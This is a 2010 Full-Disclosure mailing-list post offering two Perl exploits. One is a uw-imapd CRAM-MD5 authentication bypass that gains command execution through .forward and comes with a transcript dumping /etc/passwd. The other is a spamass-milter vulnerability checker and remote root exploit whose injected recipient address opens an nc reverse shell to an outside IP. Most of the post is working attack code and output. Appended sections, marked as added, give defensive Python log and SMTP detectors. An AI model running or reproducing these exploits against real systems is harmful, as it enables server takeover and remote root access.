[Full-disclosure] Two goodies. uw-imapd < 2004b remote exploit && spamass-milter vuln verifier
- To: full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Two goodies. uw-imapd < 2004b remote exploit && spamass-milter vuln verifier
- From: Kingcope <kcope2@xxxxxxxxxxxxxx>
- Date: Mon, 15 Mar 2010 21:27:16 +0100
(See Attached)
Cheers,
Kingcope
Here are two goodies.
1.) uw-imapd < imap-2004b Remote Exploit
2.) Spamass-milter 0day vulnerability verifier + root exploit (at the bottom)
WARNING: USE AT YOUR OWN RISK + YOU WON'T FIND MANY TARGETS FOR BOTH VULNS, I VERIFIED.
---snip---
#!/usr/bin/perl
# CVE-2005-0198 Exploit by Kingcope
# Exploited in May 2010
# One can See from the imap Banner if the Server is Vulnerable:
# Vulnerable (CRAM-MD5 supported and right IMAP4rev1 Version) is e.g.:
# * OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS AUTH=CRAM-MD5 AUTH=LOGIN] localhost IMAP4rev1 2002.332 at Sun, 14 Mar 2010 20:40:09 +0000 (GMT)
# You need a VALID username but NOT A VALID password
# Relies on both uw-imapd (< imap-2004b) and a MTA like sendmail to be installed remotely (.forward trickery).
# EXPLOIT SESSION:
#
#./imap.pl 192.168.2.17 kcope "cat /etc/passwd"
#uw-imapd (< imap-2004b) remote exploit by Kingcope
#* OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS AUTH=CRAM-MD5 AUTH=LOGIN] [192.168.2.17] IMAP4rev1 2003.338 at Sun, 14 Mar 2010 23:53:53 +0000 (GMT)
#
#++ Break In 1
#A001 NO AUTHENTICATE CRAM-MD5 failed
#A001 NO AUTHENTICATE CRAM-MD5 failed
#A001 NO AUTHENTICATE CRAM-MD5 failed
#A001 OK [CAPABILITY IMAP4REV1 IDLE NAMESPACE MAILBOX-REFERRALS BINARY UNSELECT SCAN SORT THREAD=REFERENCES THREAD=ORDEREDSUBJECT MULTIAPPEND] User kcope authenticated
#++ SUCCESS 1 - Authenticated
#++ Break In 2
#220 localhost.Belkin ESMTP Sendmail 8.12.9p2/8.12.9; Sun, 14 Mar 2010 23:54:08 GMT
#250 localhost.Belkin Hello [192.168.2.15], pleased to meet you
#250 2.1.0 me@xxxxxxxxxxxxx Sender ok
#250 2.1.5 kcope@xxxxxxxxxxxxxxxxxxx Recipient ok
#354 Enter mail, end with "." on a line by itself
#250 2.0.0 o2ENs82U002757 Message accepted for delivery
#++ Waiting for .forward file to be executed
#A002 OK DELETE completed
#A002 OK CREATE completed
#+ Ready for argument
#A002 OK APPEND completed
#* 1 EXISTS
#* 1 RECENT
#* OK [UIDVALIDITY 1268610848] UID validity status
#* OK [UIDNEXT 2] Predicted next UID
#* NO [UIDNOTSTICKY] Non-permanent unique identifiers: /tmp/0wned
#* FLAGS (\Answered \Flagged \Deleted \Draft \Seen)
#* OK [PERMANENTFLAGS ()] Permanent flags
#* OK [UNSEEN 1] first unseen message in /tmp/0wned
#A002 OK [READ-ONLY] SELECT completed
#* 1 FETCH (BODY[] {1334}
#Date: Sun, 14 Mar 2010 23:54:08 +0000
#From: kcope@xxxxxxxxxxxxxxxx
#Subject: /tmp/0wned
#MIME-Version: 1.0
#Content-Type: TEXT/PLAIN; charset=US-ASCII
# $FreeBSD: src/etc/master.passwd,v 1.25.2.6 2002/06/30 17:57:17 des Exp $
#
#root:*:0:0:Charlie &:/root:/bin/csh
#toor:*:0:0:Bourne-again Superuser:/root:
#daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
#operator:*:2:5:System &:/:/sbin/nologin
#bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
#tty:*:4:65533:Tty Sandbox:/:/sbin/nologin
#kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
#games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
#news:*:8:8:News Subsystem:/:/sbin/nologin
#man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
#sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin
#smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin
#mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/sbin/nologin
#bind:*:53:53:Bind Sandbox:/:/sbin/nologin
#uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
#xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin
#pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin
#www:*:80:80:World Wide Web Owner:/nonexistent:/sbin/nologin
#nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
#kcope:*:1001:0:User &:/home/kcope:/bin/sh
#)
#* 1 FETCH (FLAGS (\Recent \Seen))
#A002 OK FETCH completed
use Digest::HMAC_MD5 qw(hmac_md5_hex);
use MIME::Base64;
use IO::Socket::INET;
print "uw-imapd (< imap-2004b) remote exploit by Kingcope\r\n";
if ($#ARGV != 2) {
print "usage: imap.pl <host> <user> <command>\n";
print "example: imap.pl www.target.com foouser \"cat /etc/services\"\n";
exit;
}
$host = $ARGV[0];
$command = $ARGV[2];
$|=1;
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 143,
Proto => 'tcp');
$resp = <$sock>;
print $resp."\n";
print "++ Break In 1\n";
for ($k=0;$k<5;$k++) {
print $sock "A001 AUTHENTICATE CRAM-MD5\r\n";
$resp = <$sock>;
print $resp;
if (index($resp, "+") != 0) {
print "-- No CRAM-MD5 Authen supported .\n";
exit;
}
$user = $ARGV[1];
$secret = "waco";
@data = split(" ", $resp);
chomp($data[1]);
$stamp = $data[1];
$decoded_stamp = decode_base64($stamp);
$hmac = hmac_md5_hex($decoded_stamp, $secret);
$answer = encode_base64($user . ' ' . $hmac);
chomp($answer);
print $sock $answer . "\r\n";
$resp = <$sock>;
print $resp;
if (index($resp, "OK ") >= 0) {
goto Authenticated;
}
}
print "-- Could not bypass Authen .\n";
exit;
Authenticated:
print "++ SUCCESS 1 - Authenticated\n";
print "++ Break In 2\n";
$msg = "|\"/bin/sh -c '$command' > /tmp/0wned 2>&1;\"";
print $sock "A002 DELETE .forward\r\n";
print $sock "A002 CREATE .forward\r\n";
print $sock "A002 APPEND .forward (\\Seen) {". length($msg) ."}\r\n" . $msg
."\r\n";
$sock2 = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 25,
Proto => 'tcp');
$resp = <$sock2>;
print $resp;
print $sock2 "HELO you\r\n";
$resp = <$sock2>;
print $resp;
@remhost = split(" ", $resp);
print $sock2 "MAIL FROM: me\@foobar.org\r\n";
$resp = <$sock2>;
print $resp;
print $sock2 "RCPT TO: kcope\@$remhost[1]\r\n";
$resp = <$sock2>;
print $resp;
print $sock2 "DATA\r\n";
$resp = <$sock2>;
print $resp;
print $sock2 ".\r\n";
$resp = <$sock2>;
print $resp;
print "++ Waiting for .forward file to be executed\r\n";
sleep(3);
print $sock "A002 SELECT /tmp/0wned\r\n";
$resp = <$sock>;
print $resp;
print $sock "A002 FETCH 1 BODY[]\r\n";
while(<$sock>) {
print $_;
}
---snip---
The following script will check if a remote server is vulnerable to
the spamass-milter vulnerability.
---snip---
#!/usr/bin/perl
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# postfix_joker.pl
# Postfix, Sendmail w/ spamass-milter Remote Root Exploit by Kingcope
# March 2010
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
use IO::Socket;
$|=1;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');
$x = <$sock>;
print $x;
print $sock "HELO you.com\r\n";
$xown = <$sock>;
@hostname = split(" ", $xown);
print $xown;
print $sock "MAIL FROM: <root\@gmail.com>\r\n";
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster\@$hostname[1]\r\n";
$x = <$sock>;
print $x;
print $sock "DATA\r\n";
$x = <$sock>;
print $x;
print $sock
"XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X\r\n";
print $sock "\r\n.\r\n";
$x = <$sock>;
print $x;
if (!($x =~ "Blocked by SpamAssassin")) {
exit;
}
print "\n\n$ARGV[0] RUNS SPAMASS-MILTER!\n";
open LOGFILE, ">>log.txt";
print LOGFILE "\n\n$ARGV[0] RUNS SPAMASS-MILTER!\n";
close LOGFILE;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');
$x = <$sock>;
print $x;
print $sock "HELO you.com\r\n";
$xown = <$sock>;
@hostname = split(" ", $xown);
print $xown;
print $sock "MAIL FROM: <root\@gmail.com>\r\n";
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster+:(\"|pkill -HUP smtpd|\")\@$hostname[1]\r\n";
$x = <$sock>;
if ($x=="") {
print "\n\n$ARGV[0] IS VULNERABLE!\n";
open LOGFILE, ">>log.txt";
print LOGFILE "\n\n$ARGV[0] IS VULNERABLE!\n";
close LOGFILE;
exit;
}
print $x;
print $sock "RCPT TO: postmaster+(\"|pkill -HUP sendmail|\")\@$hostname[1]\r\n";
$x = <$sock>;
if ($x=="") {
print "\n\n$ARGV[0] IS VULNERABLE!\n";
open LOGFILE, ">>log.txt";
print LOGFILE "\n\n$ARGV[0] IS VULNERABLE!\n";
close LOGFILE;
exit;
}
print $x;
print $sock "QUIT\r\n";
while(<$sock>) {
print;
}
---snip---
Spamass-milter Root Exploit PoC
---snip---
#!/usr/bin/perl
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# postfix_joker.pl
# Postfix, Sendmail w/ spamass-milter Remote Root Exploit by Kingcope
# March 2010
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
use IO::Socket;
$|=1;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');
$x = <$sock>;
print $x;
print $sock "HELO you.com\r\n";
$xown = <$sock>;
@hostname = split(" ", $xown);
print $xown;
print $sock "MAIL FROM: <root\@gmail.com>\r\n";
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster\@$hostname[1]\r\n";
$x = <$sock>;
print $x;
print $sock "DATA\r\n";
$x = <$sock>;
print $x;
print $sock
"XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X\r\n";
print $sock "\r\n.\r\n";
$x = <$sock>;
print $x;
if (!($x =~ "Blocked by SpamAssassin")) {
exit;
}
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');
$x = <$sock>;
print $x;
print $sock "HELO you.com\r\n";
$xown = <$sock>;
@hostname = split(" ", $xown);
print $xown;
print $sock "MAIL FROM: <root\@gmail.com>\r\n";
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster+:(\"|nc -e /bin/sh 85.25.67.37 5555;sleep
1000|\")\@$hostname[1]\r\n"; # POSTFIX!
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster+(\"|nc -e /bin/sh 85.25.67.37 5555;sleep
1000|\")\@$hostname[1]\r\n"; # SENDMAIL!
$x = <$sock>;
print $x;
print $sock "QUIT\r\n";
while(<$sock>) {
print;
}
---snip---
Cheers,
Kingcope
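Added example, not part of Kingcope's post: a defender-side log check for the authentication pattern the uw-imapd exploit leaves behind, a burst of CRAM-MD5 failures for one user from one client followed within seconds by a CRAM-MD5 success for the same pair (the session transcript in the exploit comments shows exactly three failures and then an OK). The syslog-style line format, the host addresses and the thresholds are constructed assumptions, not uw-imapd's actual log wording.

```python
"""Flag CRAM-MD5 logins that succeed right after a burst of failures.
Log format below is a constructed approximation, not uw-imapd's own."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed syslog-style line: "<iso-ts> imapd[pid]: <event> user=U host=[H] [method=M]"
LINE_RE = re.compile(
    r'^(?P<ts>\S+) imapd\[\d+\]: (?P<event>AUTHENTICATE CRAM-MD5 failure|Authenticated) '
    r'user=(?P<user>\S+) host=\[(?P<host>[^\]]+)\](?: method=(?P<method>\S+))?$'
)

def detect_cram_bypass(lines, min_failures=2, window_s=30):
    """Return (user, host, failure_count, success_ts) for each suspicious sequence."""
    recent = defaultdict(list)   # (user, host) -> timestamps of recent failures
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.fromisoformat(m['ts'])
        key = (m['user'], m['host'])
        if m['event'].endswith('failure'):
            recent[key].append(ts)
            continue
        if m['method'] != 'CRAM-MD5':      # success via another mechanism: ignore
            continue
        fails = [t for t in recent[key] if (ts - t).total_seconds() <= window_s]
        if len(fails) >= min_failures:
            alerts.append((m['user'], m['host'], len(fails), m['ts']))
        recent[key].clear()                # a success ends the sequence either way
    return alerts

SAMPLE_LOG = [  # constructed; mirrors the exploit's three-failures-then-OK transcript
    "2010-03-14T23:53:55 imapd[2750]: AUTHENTICATE CRAM-MD5 failure user=kcope host=[192.0.2.15]",
    "2010-03-14T23:53:56 imapd[2750]: AUTHENTICATE CRAM-MD5 failure user=kcope host=[192.0.2.15]",
    "2010-03-14T23:53:57 imapd[2750]: AUTHENTICATE CRAM-MD5 failure user=kcope host=[192.0.2.15]",
    "2010-03-14T23:53:58 imapd[2750]: Authenticated user=kcope host=[192.0.2.15] method=CRAM-MD5",
    # one mistyped password followed by a correct one is normal and stays below the threshold
    "2010-03-14T23:55:01 imapd[2761]: AUTHENTICATE CRAM-MD5 failure user=alice host=[192.0.2.20]",
    "2010-03-14T23:55:09 imapd[2761]: Authenticated user=alice host=[192.0.2.20] method=CRAM-MD5",
]

if __name__ == "__main__":
    for user, host, n, when in detect_cram_bypass(SAMPLE_LOG):
        print(f"{when}: {user} from {host} authenticated after {n} CRAM-MD5 failures")
```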
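Added example, not from the post: a gateway-side check that alerts on RCPT TO local parts carrying shell metacharacters, which is the ingredient the postmaster+:("|...|")@host addresses in the spamass-milter verifier rely on. The SMTP session lines and hostnames are constructed, and the metacharacter set is this example's own choice.

```python
"""Flag SMTP RCPT TO local parts that carry shell metacharacters.
Session lines and hostnames below are constructed for this example."""
import re
from dataclasses import dataclass

# Characters a legitimate local part has no reason to contain when the address
# may later be handed to a shell (set chosen for this example).
SHELL_META = re.compile(r'''[|;&`$(){}<>"'\\\n]''')
# Argument of an SMTP "RCPT TO:" command as the client sent it.
RCPT_RE = re.compile(r'^RCPT TO:\s*(.+?)\s*$', re.I)

@dataclass
class Finding:
    line_no: int
    recipient: str
    local_part: str
    meta: str   # offending characters, sorted and de-duplicated

def split_address(addr):
    """Split on the LAST '@' so an '@' smuggled into the local part stays there."""
    local, sep, domain = addr.rpartition('@')
    return (local, domain) if sep else (addr, '')

def check_rcpt(addr):
    """Return the metacharacters present in the local part, '' when clean."""
    local, _ = split_address(addr)
    return ''.join(sorted(set(SHELL_META.findall(local))))

def scan_session(lines):
    """Scan client-side SMTP lines; return a Finding for each risky RCPT TO."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = RCPT_RE.match(line)
        if not m:
            continue
        rcpt = m.group(1)
        if rcpt.startswith('<') and rcpt.endswith('>'):
            rcpt = rcpt[1:-1]          # strip the optional angle brackets
        meta = check_rcpt(rcpt)
        if meta:
            findings.append(Finding(no, rcpt, split_address(rcpt)[0], meta))
    return findings

SAMPLE_SESSION = [  # constructed, modelled on the verifier's SMTP dialogue
    "HELO you.com",
    "MAIL FROM: <root@example.org>",
    "RCPT TO: postmaster@mail.example.net",
    'RCPT TO: postmaster+:("|pkill -HUP smtpd|")@mail.example.net',
    "RCPT TO: <alice+newsletter@mail.example.net>",   # plus-addressing alone is fine
]

if __name__ == "__main__":
    for f in scan_session(SAMPLE_SESSION):
        print(f"line {f.line_no}: local part {f.local_part!r} contains {f.meta!r}")
```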
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/